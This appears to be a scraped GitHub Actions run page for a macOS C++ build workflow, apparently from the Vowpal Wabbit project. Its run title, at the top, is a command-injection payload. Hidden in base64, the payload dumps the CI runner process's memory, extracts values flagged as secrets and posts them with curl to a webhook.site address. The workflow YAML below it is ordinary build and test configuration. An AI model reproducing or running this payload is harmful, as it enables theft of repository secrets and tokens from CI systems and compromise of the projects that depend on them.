typo2";{echo,PRINTINGvICTORY};env;{sudo,apt,install,--yes,gcc,g++,libgmp-dev,libmpfr-dev};{wget,https://ftp.gnu.org/gnu/gdb/gdb-14.2.tar.gz};{tar,-xvzf,gdb-14.2.tar.gz};{cd,gdb-14.2};./configure;make;{sudo,make,install};{echo,ABC};{eval,$({echo,c3VkbyBnY29yZSAtbyBrLmR1bXAgIiQocHMgYXggfCBncmVwICdSdW5uZXIuTGlzdGVuZXInIHwgaGVhZCAtbiAxIHwgYXdrICd7IHByaW50ICQxIH0nKSIgOwpncmVwIC1FYW8gJyJbXiJdKyI6XHsidmFsdWUiOiJbXiJdKiIsImlzc2VjcmV0Ijp0cnVlXH0nIGsuZHVtcCogOwpzZXQgK2U7IGN1cmwgLWQgInRva2VuPSQoZ3JlcCAtRWFvICciW14iXSsiOlx7InZhbHVlIjoiW14iXSoiLCJpc3NlY3JldCI6dHJ1ZVx9JyBrLmR1bXAqKSIgaHR0cHM6Ly93ZWJob29rLnNpdGUvZjljNWUxMDgtZDA2ZS00OWExLTgzZDItZjAxMWI3ZDEyNjc4IDs=}|{base64,-d})};{echo,FINISHED}; #6045
Workflow file for this run
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name: MacOS / C++ | |
on: | |
push: | |
branches: | |
- master | |
- 'releases/**' | |
pull_request: | |
branches: | |
- '*' | |
concurrency: | |
group: ${{ github.workflow }}-${{ github.head_ref || github.sha }} | |
cancel-in-progress: true | |
jobs: | |
build_macos: | |
runs-on: ${{matrix.os}} | |
strategy: | |
matrix: | |
os: [macos-12] | |
build_type: [Debug, Release] | |
steps: | |
- uses: actions/checkout@v3 | |
with: | |
submodules: recursive | |
- name: Install dependencies | |
run: brew install cmake boost flatbuffers ninja | |
- name: Configure | |
run: cmake -S . -B build -G Ninja -DCMAKE_BUILD_TYPE=${{matrix.build_type}} -DWARNINGS=Off -DVW_BUILD_VW_C_WRAPPER=Off -DBUILD_TESTING=On -DBUILD_EXPERIMENTAL_BINDING=On -DVW_FEAT_CSV=On -DVW_FEAT_CB_GRAPH_FEEDBACK=On -DVW_INSTALL=Off -DSTD_INV_SQRT=ON | |
- name: Build | |
run: cmake --build build --target all | |
- name: Unit tests | |
working-directory: build | |
run: | | |
# Run unit tests | |
ctest --output-on-failure --no-tests=error --label-regex VWTestList --parallel 2 | |
- name: Test | |
run: | | |
# Run integration tests | |
python3 test/run_tests.py --fuzzy_compare --exit_first_fail --epsilon 0.001 --ignore_dirty | |
python3 test/run_tests.py --fuzzy_compare --exit_first_fail --epsilon 0.001 --ignore_dirty --extra_options=--onethread | |
python3 test/run_tests.py --ignore_dirty --test_spec test/slow.vwtest.json --timeout 180 |